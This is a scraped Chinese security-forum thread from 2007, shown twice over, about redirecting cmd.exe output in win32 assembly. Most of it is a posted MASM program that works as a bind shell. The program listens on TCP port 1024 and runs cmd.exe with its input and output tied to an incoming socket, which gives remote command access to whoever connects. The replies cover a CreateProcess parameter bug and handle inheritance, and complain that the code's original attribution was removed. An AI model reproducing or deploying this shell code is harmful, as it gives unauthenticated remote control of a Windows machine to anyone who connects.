[讨论]win32汇编如何实现cmd的输出转向-编程技术-看雪-安全社区|安全招聘|kanxue.com

最新回复 (6)
WisdomZh 雪币： 202 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 110 粉丝 0 关注私信	WisdomZh 2 楼有点意思, 关注一下 2007-1-6 21:55 0
Winker 雪币： 796 活跃值： (370) 能力值： ( LV9，RANK：380 ) 在线值：发帖 133 回帖 1127 粉丝 19 关注私信	Winker 8 3 楼谁来回答一下，我ＯＤ都看眼花了，源代码： .386P .model flat,stdcall option casemap:none include windows.inc include user32.inc include kernel32.inc include wsock32.inc include Ws2_32.inc includelib user32.lib includelib kernel32.lib includelib wsock32.lib includelib Ws2_32.lib TCP_PORT equ 1024 ;常量定义 .data szCommand db 'cmd.exe',0 .data? hScoket SOCKET ? hScoketOther SOCKET ? szBuffer db MAX_PATH dup(?) dwSize DWORD ? .code _ProcessMain proc local @wsaData:WSADATA local @hScoket:SOCKET local @stAddr:sockaddr_in local stStartUp:STARTUPINFO local stProcInfo:PROCESS_INFORMATION invoke WSAStartup,0202H,addr @wsaData ;初始化WSAStartup库 mov @stAddr.sin_family,AF_INET ;设置IP格式 invoke htons,TCP_PORT ;设置端口 mov @stAddr.sin_port,ax ;保存 mov @stAddr.sin_addr,INADDR_ANY ;设置IP地址 invoke WSASocket,AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0 ;加载套接字 mov hScoket,eax ;保存句柄 invoke bind,hScoket,addr @stAddr,sizeof sockaddr_in ;绑定 .if eax == SOCKET_ERROR mov eax,FALSE ret .endif invoke listen,hScoket,5 ;开始监听，默认连接5个 invoke accept,hScoket,NULL,NULL ;如果有客户端连接，马上确定 .if eax == INVALID_SOCKET mov eax,FALSE ret .endif mov hScoketOther,eax invoke GetStartupInfo,addr stStartUp mov ebx,hScoketOther mov stStartUp.hStdInput,ebx ;为STARTUPINFO的结构成员赋值,这个值是accept()返回的句柄 mov stStartUp.hStdOutput,ebx mov stStartUp.hStdError,ebx mov stStartUp.dwFlags,STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES mov stStartUp.wShowWindow,SW_HIDE mov stStartUp.wShowWindow,SW_SHOWNORMAL invoke CreateProcess,NULL,addr szCommand,NULL,NULL,\ NULL,NORMAL_PRIORITY_CLASS,NULL,NULL,addr stStartUp,addr stProcInfo ;将结果载入并执行cmd ret _ProcessMain endp start: invoke _ProcessMain invoke ExitProcess,NULL end start 2007-1-7 20:21 0
jjnet 雪币： 101 活跃值： (12) 能力值： ( LV12，RANK：210 ) 在线值：发帖 28 回帖 503 粉丝 1 关注私信	jjnet 5 4 楼 clientFD 这个句并应该需要SetHandleInformation成HANDLE_FLAG_INHERIT的去吧？？？ 2007-1-11 16:55 0
4st0ne 雪币： 642 活跃值： (2882) 能力值： ( LV10，RANK：170 ) 在线值：发帖 31 回帖 315 粉丝 0 关注私信	4st0ne 4 5 楼最初由 Winker* 发布* 谁来回答一下，我ＯＤ都看眼花了，源代码： .386P .model flat,stdcall option casemap:none ........ 为什么转载总是要把人家的信息去掉? 2007-1-12 14:34 0
leyuxin 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 5 粉丝 0 关注私信	leyuxin 6 楼这个红狼的ASM大哥公布的代码为何把头信息给人家删了 2007-1-12 17:42 0
Winker 雪币： 796 活跃值： (370) 能力值： ( LV9，RANK：380 ) 在线值：发帖 133 回帖 1127 粉丝 19 关注私信	Winker 8 7 楼我就是红狼的asm，经常混邪恶八进制，winker是我在看雪的马甲这个问题已经解决了： http://forum.eviloctal.com/read-htm-tid-26719.html 原来只是CreateProcess的一个参数问题 2007-1-13 16:55 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (6)
WisdomZh 雪币： 202 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 110 粉丝 0 关注私信	WisdomZh 2 楼有点意思, 关注一下 2007-1-6 21:55 0
Winker 雪币： 796 活跃值： (370) 能力值： ( LV9，RANK：380 ) 在线值：发帖 133 回帖 1127 粉丝 19 关注私信	Winker 8 3 楼谁来回答一下，我ＯＤ都看眼花了，源代码： .386P .model flat,stdcall option casemap:none include windows.inc include user32.inc include kernel32.inc include wsock32.inc include Ws2_32.inc includelib user32.lib includelib kernel32.lib includelib wsock32.lib includelib Ws2_32.lib TCP_PORT equ 1024 ;常量定义 .data szCommand db 'cmd.exe',0 .data? hScoket SOCKET ? hScoketOther SOCKET ? szBuffer db MAX_PATH dup(?) dwSize DWORD ? .code _ProcessMain proc local @wsaData:WSADATA local @hScoket:SOCKET local @stAddr:sockaddr_in local stStartUp:STARTUPINFO local stProcInfo:PROCESS_INFORMATION invoke WSAStartup,0202H,addr @wsaData ;初始化WSAStartup库 mov @stAddr.sin_family,AF_INET ;设置IP格式 invoke htons,TCP_PORT ;设置端口 mov @stAddr.sin_port,ax ;保存 mov @stAddr.sin_addr,INADDR_ANY ;设置IP地址 invoke WSASocket,AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0 ;加载套接字 mov hScoket,eax ;保存句柄 invoke bind,hScoket,addr @stAddr,sizeof sockaddr_in ;绑定 .if eax == SOCKET_ERROR mov eax,FALSE ret .endif invoke listen,hScoket,5 ;开始监听，默认连接5个 invoke accept,hScoket,NULL,NULL ;如果有客户端连接，马上确定 .if eax == INVALID_SOCKET mov eax,FALSE ret .endif mov hScoketOther,eax invoke GetStartupInfo,addr stStartUp mov ebx,hScoketOther mov stStartUp.hStdInput,ebx ;为STARTUPINFO的结构成员赋值,这个值是accept()返回的句柄 mov stStartUp.hStdOutput,ebx mov stStartUp.hStdError,ebx mov stStartUp.dwFlags,STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES mov stStartUp.wShowWindow,SW_HIDE mov stStartUp.wShowWindow,SW_SHOWNORMAL invoke CreateProcess,NULL,addr szCommand,NULL,NULL,\ NULL,NORMAL_PRIORITY_CLASS,NULL,NULL,addr stStartUp,addr stProcInfo ;将结果载入并执行cmd ret _ProcessMain endp start: invoke _ProcessMain invoke ExitProcess,NULL end start 2007-1-7 20:21 0
jjnet 雪币： 101 活跃值： (12) 能力值： ( LV12，RANK：210 ) 在线值：发帖 28 回帖 503 粉丝 1 关注私信	jjnet 5 4 楼 clientFD 这个句并应该需要SetHandleInformation成HANDLE_FLAG_INHERIT的去吧？？？ 2007-1-11 16:55 0
4st0ne 雪币： 642 活跃值： (2882) 能力值： ( LV10，RANK：170 ) 在线值：发帖 31 回帖 315 粉丝 0 关注私信	4st0ne 4 5 楼最初由 Winker* 发布* 谁来回答一下，我ＯＤ都看眼花了，源代码： .386P .model flat,stdcall option casemap:none ........ 为什么转载总是要把人家的信息去掉? 2007-1-12 14:34 0
leyuxin 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 5 粉丝 0 关注私信	leyuxin 6 楼这个红狼的ASM大哥公布的代码为何把头信息给人家删了 2007-1-12 17:42 0
Winker 雪币： 796 活跃值： (370) 能力值： ( LV9，RANK：380 ) 在线值：发帖 133 回帖 1127 粉丝 19 关注私信	Winker 8 7 楼我就是红狼的asm，经常混邪恶八进制，winker是我在看雪的马甲这个问题已经解决了： http://forum.eviloctal.com/read-htm-tid-26719.html 原来只是CreateProcess的一个参数问题 2007-1-13 16:55 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复